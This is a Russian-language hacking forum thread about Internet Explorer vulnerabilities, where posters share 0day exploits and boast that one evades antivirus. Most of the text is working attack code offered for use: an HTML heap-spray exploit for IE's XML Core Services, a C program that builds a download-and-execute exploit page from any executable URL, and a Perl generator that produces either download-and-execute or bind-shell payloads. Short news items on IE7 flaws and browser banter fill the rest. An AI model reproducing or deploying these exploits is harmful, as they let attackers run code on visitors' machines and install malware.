Microsoft Internet Explorer

[not null]

Microsoft Internet Explorer VML Remote Buffer Overflow Exploit (0day)
Внимание! Пробивает SP2, не палится антивирусом.
В приведенном примере открывает калькулятор
Скачать|Download
Проверить себя

 

[Great]

не палится антивирусом.

уже палится. У меня НОД заорал матом.

 

[gemaglabin]

VML баз уже разжевали не менее чем в 4 паблик и 2х ( что у меня ) приват сплоитах

 

[not null]

И снова ослик IE, и снова переполнение буфера...
Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
Works on all Windows XP versions including SP2
Metasploit
HTML-версия
Провериться

 

[Great]

Провериться

ппц. работает
и нафиг в паблик выложили, ужс просто. ща всякие долбаебы побегут всех ослоюзеров троянить нах

 

[Robin Gud]

Вот зараза, проверил на другой машине пашет...calc появился
А основная уже пропатчена

 

[Great]

Robin Gud
а я осла вообще не юзаю :P

 

[falk]

Вот ещё две уязвимости для IE:

Первая уязвимость касается работы скриптов на веб-страницах. Когда пользователь находится на вредоносной странице, недоброжелатель может посмотреть информацию, которая видна в других открытых окнах браузера, пишет 3Dnews.

Вторая уязвимость является более серьезной и касается того, как обрабатываются приложения HTA. Пользователя могут склонить к открытию вредоносного файла, который, в свою очередь, может запустить код. При этом, доступ к файлу должен осуществляться через протоколы SMB или WebDAV. Корпорация Microsoft отреагировала на обнаружение уязвимостей сообщением о том, что исследует их. Да и ещё кстати на второй странице этой темы -вирус, так что лучше не заходите на неё! :excl:

 

[fired0z]

Патч тоже не помогает.
На пропатченой тачке ослик орет что совершил ошибку и вылетает.

 

[SapienS]

Internet Explorer 7 Window Injection Vulnerability
Уязвимые версии: Microsoft Internet Explorer 7.x

Тест

Источник: http://secunia.com

 

[lance]

Не успел 7 эксплорер выйти, как уже 2 дыры нашли =)
************************************************
Microsoft подтвердила уязвимость в адресной строке Internet Explorer 7, о которой впервые сообщила в среду фирма Secunia . Обнаруженная проблема состоит в том, что специальным образом созданный URL может скрывать часть адреса, тем самым открывая пользователя для возможных атак, включая фишинговые , или выполнения действий, о которых он не будет подозревать. Secunia присвоила уязвимости рейтинг “less critical”. Здесь Secunia продемонстрировала работу уязвимости в IE7, запущенном на Windows XP SP2. Microsoft сообщила, что пока случаев использования ошибки не было зарегестрировано и посоветовала пользователям использовать Microsoft Phishing Filter, который встроен в IE7. “Онлайн-сервис Microsoft Phishing Filter позволяет иметь оперативную информацию о сайтах”, - отмечает в своём блоге Кристофер Бадд, сотрудник центра безопасности Microsoft. Microsoft уже начала исследование проблемы и “как только закончит её исследование, примет соответствующие меры для защиты пользователей”. Однако Бадд преуменьшил опасность уязвимости, указав на то, что полный адрес всё же можно отобразить в строке адреса при прокрутке.

 

[not null]

MS Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit

<html xmlns="http://www.w3.org/1999/xhtml">
<body>
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" >
</object>
<script>
var obj = null;
function exploit() {
obj = document.getElementById('target').object;

try {
obj.open(new Array(),new Array(),new Array(),new Array(),new Array());
} catch(e) {};

sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" +
	"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
	"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
	"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
	"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
	"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
	"%uFF57%u63E7%u6C61%u0063");

sz = sh.length * 2;
npsz = 0x400000-(sz+0x38);
nps = unescape ("%u0D0D%u0D0D");
while (nps.length*2<npsz) nps+=nps;
ihbc = (0x12000000-0x400000)/0x400000;
mm = new Array();
for (i=0;i<ihbc;i++) mm[i] = nps+sh;

obj.open(new Object(),new Object(),new Object(),new Object(), new Object());    

obj.setRequestHeader(new Object(),'......');
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
obj.setRequestHeader(new Object(),0x12345678);
}
</script>
<body onLoad='exploit()' value='Exploit'>

</body></html>

Вызывает калькулятор.
Работает, но осел падает замертво.

 

[wutang]

MS Internet Explorer 6/7 (XML Core Services) Download_exec

/*
*-----------------------------------------------------------------------
*
*  Edited by : Azeem
*greetz to  LukeHack & milw0rm
*Mail: azimyasin@gmail.com
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

FILE *fp = NULL;
char *file = "HackIe.html";
char *url = NULL;

unsigned char sc[] =     
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";

char * header =
"<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.1 plus 2.0//EN\">"
"<html xmlns=\"http://www.w3.org/1999/xhtml\">\n"
"<body>\n"
"<object id=target classid=\"CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}\" >\n"
"</object>\n"
"<script>\n"
"var obj = null;\n"
"function exploit() {\n"
"obj = document.getElementById('target').object\n"
"try {\n"
"obj.open(new Array(),new Array(),new Array(),new Array(),new Array())\n"
"} catch(e) {}\n"
"\tvar sh = unescape(\"%u9090\"+\"%u9090\"+ \n";

char * footer =
"sz = sh.length * 2;\n"
"npsz = 0x400000-(sz+0x38);\n"
"nps = unescape (\"%u0D0D%u0D0D\");\n"
"while (nps.length*2<npsz) nps+=nps;\n"
"ihbc = (0x12000000-0x400000)/0x400000;\n"
"mm = new Array();\n"
"for (i=0;i<ihbc;i++) mm[i] = nps+sh;\n"
"obj.open(new Object(),new Object(),new Object(),new Object(), new Object());\n"

"obj.setRequestHeader(new Object(),'......');\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"obj.setRequestHeader(new Object(),0x12345678);\n"
"}\n"
"</script>\n"
"<body onLoad='exploit()' value='Exploit'>\n"
"</body></html>\n";





void PrintPayLoad(char *lpBuff, int buffsize)
{
   int i;
   for(i=0;i<buffsize;i+=2)
   {
       if((i%16)==0)
       {
           if(i!=0)
           {
               printf("\"\n\"");
               fprintf(fp, "%s", "\" +\n\"");
           }
           else
           {
               printf("\"");
               fprintf(fp, "%s", "\"");
           }
       }

       printf("%%u%0.4x",((unsigned short*)lpBuff)[i/2]);

       fprintf(fp, "%%u%0.4x",((unsigned short*)lpBuff)[i/2]);
     }


       printf("\";\n");
       fprintf(fp, "%s", "\");\n");


   fflush(fp);
}

void main(int argc, char **argv)
{
   unsigned char buf[1024] = {0};

   int sc_len = 0;


   if (argc < 2)
   {
      printf("MS Internet Explorer 6/7 (XML Core Services)  Remote Code Execution Exploit Author: n/a \n");
      printf("Coded by Azeem Greetz to LukeHack\n");
      printf("\r\nUsage: %s <exe_URL> [htmlfile]\r\n\n", argv[0]);
      exit(1);
   }

   url = argv[1];


    if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
    {
        printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
        return;
    }

      printf("[+] download url:%s\n", url);

      if(argc >=3) file = argv[2];
      printf("[+] exploit file:%s\n", file);

   fp = fopen(file, "w");
   if(!fp)
   {
       printf("[-] Open file error!\n");
          return;
   }

   fprintf(fp, "%s", header);
   fflush(fp);

   memset(buf, 0, sizeof(buf));
   sc_len = sizeof(sc)-1;
   memcpy(buf, sc, sc_len);
   memcpy(buf+sc_len, url, strlen(url));

   sc_len += strlen(url)+1;
   PrintPayLoad(buf, sc_len);

   fprintf(fp, "%s", footer);
   fflush(fp);

   printf("[+] exploit write to %s success!\n", file);
}

 

[wutang]

Очередная версия
MS IE 6/7 (XML Core Services) Rem0t3 c0d3 Executi0n Expl0it

#!perl/bin 
#Gr33tZ => O.G. | chaos | sakkure | nukedx | xoron | Stansar ^^ 
#(c)0d3d by pang0 
#MS IE 6/7 (XML Core Services) Rem0t3 c0d3 Executi0n Expl0it 
#usage : perl wow.pl <shell> <outputting_file> 
#FR0M => www.TcBilisim.Org 
#Image is n0thing Security is Everything ^^ 
#n0t => binding port 31337 : ) 
#SHELL => BÝND SHELL => -b 
#SHELL => DOWN And EXEC => -d 
use IO::Handle; 
if (@ARGV < 2) 
{ 
print ' 
Gr33tZ = O.G. | chaos | sakkure | nukedx | xoron | Stansar ^^ 
MS IE 6/7 (XML Core Services) Rem0t3 c0d3 Executi0n Expl0it 
(c)0d3d by pang0 -> www.TcBilisim.Org 
' 
and 
print "usage : perl $0  <sh3ll> <outputting_html> <url or null>\n"; 
print ' 
-d => Download And Exec. Shell 
-b => Win32 Bind Shell (port => 31337) 
if You Select -d You Must Enter File_url 
or You Select -b Null ^^ 
'; 
print "Example : perl $0 -b laz.html \n"; 
print "Example : perl $0 -d laz.html http://blah.com/nc.exe \n" 
and 
exit; 
} 
$html = $ARGV[1]; 
my $shcode = 
"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03". 
"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74". 
"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E". 
"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03". 
"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C". 
"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40". 
"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C". 
"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC". 
"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F". 
"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB". 
"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83". 
"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF". 
"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF". 
"$ARGV[2]"; 
# [win32_bind sh3llc0d3] LPORT=31337 thx => www.metasploit.com 
my $shall = 
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x61". 
"\x19\x4c\x17\x83\xeb\xfc\xe2\xf4\x9d\x73\xa7\x5a\x89\xe0\xb3\xe8". 
"\x9e\x79\xc7\x7b\x45\x3d\xc7\x52\x5d\x92\x30\x12\x19\x18\xa3\x9c". 
"\x2e\x01\xc7\x48\x41\x18\xa7\x5e\xea\x2d\xc7\x16\x8f\x28\x8c\x8e". 
"\xcd\x9d\x8c\x63\x66\xd8\x86\x1a\x60\xdb\xa7\xe3\x5a\x4d\x68\x3f". 
"\x14\xfc\xc7\x48\x45\x18\xa7\x71\xea\x15\x07\x9c\x3e\x05\x4d\xfc". 
"\x62\x35\xc7\x9e\x0d\x3d\x50\x76\xa2\x28\x97\x73\xea\x5a\x7c\x9c". 
"\x21\x15\xc7\x67\x7d\xb4\xc7\x57\x69\x47\x24\x99\x2f\x17\xa0\x47". 
"\x9e\xcf\x2a\x44\x07\x71\x7f\x25\x09\x6e\x3f\x25\x3e\x4d\xb3\xc7". 
"\x09\xd2\xa1\xeb\x5a\x49\xb3\xc1\x3e\x90\xa9\x71\xe0\xf4\x44\x15". 
"\x34\x73\x4e\xe8\xb1\x71\x95\x1e\x94\xb4\x1b\xe8\xb7\x4a\x1f\x44". 
"\x32\x4a\x0f\x44\x22\x4a\xb3\xc7\x07\x71\x36\x7e\x07\x4a\xc5\xf6". 
"\xf4\x71\xe8\x0d\x11\xde\x1b\xe8\xb7\x73\x5c\x46\x34\xe6\x9c\x7f". 
"\xc5\xb4\x62\xfe\x36\xe6\x9a\x44\x34\xe6\x9c\x7f\x84\x50\xca\x5e". 
"\x36\xe6\x9a\x47\x35\x4d\x19\xe8\xb1\x8a\x24\xf0\x18\xdf\x35\x40". 
"\x9e\xcf\x19\xe8\xb1\x7f\x26\x73\x07\x71\x2f\x7a\xe8\xfc\x26\x47". 
"\x38\x30\x80\x9e\x86\x73\x08\x9e\x83\x28\x8c\xe4\xcb\xe7\x0e\x3a". 
"\x9f\x5b\x60\x84\xec\x63\x74\xbc\xca\xb2\x24\x65\x9f\xaa\x5a\xe8". 
"\x14\x5d\xb3\xc1\x3a\x4e\x1e\x46\x30\x48\x26\x16\x30\x48\x19\x46". 
"\x9e\xc9\x24\xba\xb8\x1c\x82\x44\x9e\xcf\x26\xe8\x9e\x2e\xb3\xc7". 
"\xea\x4e\xb0\x94\xa5\x7d\xb3\xc1\x33\xe6\x9c\x7f\x91\x93\x48\x48". 
"\x32\xe6\x9a\xe8\xb1\x19\x4c\x17"; 
if ($ARGV[0] eq '-d') { 
$sh = $shcode; 
if ($ARGV[2] =~ /http/) {goto tamam;} 
if ($ARGV[2] =~ /ftp/) {goto tamam;} 
else { 
print ' 
[-] You Must Start http:// or ftp:// 
' 
and 
exit; 
} 
} 
if ($ARGV[0] eq '-b') { 
$sh = $shall; 
if (!$ARGV[2] =~ /w/) {goto tamam;} 
else { 
goto tamam; 
} 
} 
tamam: 
for(;;) 
{ 
my $kod = 
<<KOD 
<html xmlns="http://www.w3.org/1999/xhtml"> 
<body> 
<object id=target classid="CLSID:{88d969c5-f192-11d4-a65f-0040963251e5}" > 
</object> 
<script> 
var obj = null; 
function exploit() { 
obj = document.getElementById('target').object; 

try { 
obj.open(new Array(),new Array(),new Array(),new Array(),new Array()); 
} catch(e) {}; 

KOD 
; 
$tamkod = dongu($sh); 
#______________citati0n t0 YAG KOHHA's WebViewFolderIcon Expl0itZ_______________ 
sub dongu { 
        my $data = shift; 
        my $mode = shift() || 'LE'; 
        my $code = ''; 

        my $idx = 0; 

        if (length($data) % 2 != 0) { 
                $data .= substr($data, -1, 1); 
        } 

        while ($idx < length($data) - 1) { 
                my $c1 = ord(substr($data, $idx, 1)); 
                my $c2 = ord(substr($data, $idx+1, 1)); 
                if ($mode eq 'LE') { 
                        $code .= sprintf('%%u%.2x%.2x', $c2, $c1); 
                } else { 
                        $code .= sprintf('%%u%.2x%.2x', $c1, $c2); 
                } 
                $idx += 2; 
        } 

        return $code; 
} 
#_______________________________________________________________________________ 
my $sh3ll = 
<<SHELL 
sh = unescape ("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090" + 
              "%u9090%u9090$tamkod"); 
SHELL 
; 
my $tam = 
<<TAM 
sz = sh.length * 2; 
npsz = 0x400000-(sz+0x38); 
nps = unescape ("%u0D0D%u0D0D"); 
while (nps.length*2<npsz) nps+=nps; 
ihbc = (0x12000000-0x400000)/0x400000; 
mm = new Array(); 
for (i=0;i<ihbc;i++) mm[i] = nps+sh; 

obj.open(new Object(),new Object(),new Object(),new Object(), new Object()); 

obj.setRequestHeader(new Object(),'......'); 
obj.setRequestHeader(new Object(),0x12345678); 
obj.setRequestHeader(new Object(),0x12345678); 
obj.setRequestHeader(new Object(),0x12345678); 
obj.setRequestHeader(new Object(),0x12345678); 
obj.setRequestHeader(new Object(),0x12345678); 
obj.setRequestHeader(new Object(),0x12345678); 
obj.setRequestHeader(new Object(),0x12345678); 
obj.setRequestHeader(new Object(),0x12345678); 
obj.setRequestHeader(new Object(),0x12345678); 
obj.setRequestHeader(new Object(),0x12345678); 
obj.setRequestHeader(new Object(),0x12345678); 
} 
</script> 
<body onLoad='exploit()' value='Exploit'> 

</body></html> 
TAM 
; 
open X, "$html" or die "[-] $html File Create Failed \n" and exit; 
print X $kod; 
print X $sh3ll; 
print X $tam; 
X->close; 
sleep(1); 
if (-e $html) 
{ 
print "[+] $html File Is Created ^^\n"; 
} 
exit(1); 
}

 

[forve]

осёл он и в африке осёл...
я не понимаю людей которые его вообще юзают...
самая распространненная версия осла сча-6.0 и под него куча багов, да под 7.0 я тож думаю будет немало... Юзайте ОПЕРУ и всё будет в шоколаде

 

[lance]

Да файерфокс тоже бажным оказался, так что опера - наш друг. Кстати на одном хацкерском портале делают хак-броузер =) Из функций многострочность ввода url и подмена user-agent. Ждёмс.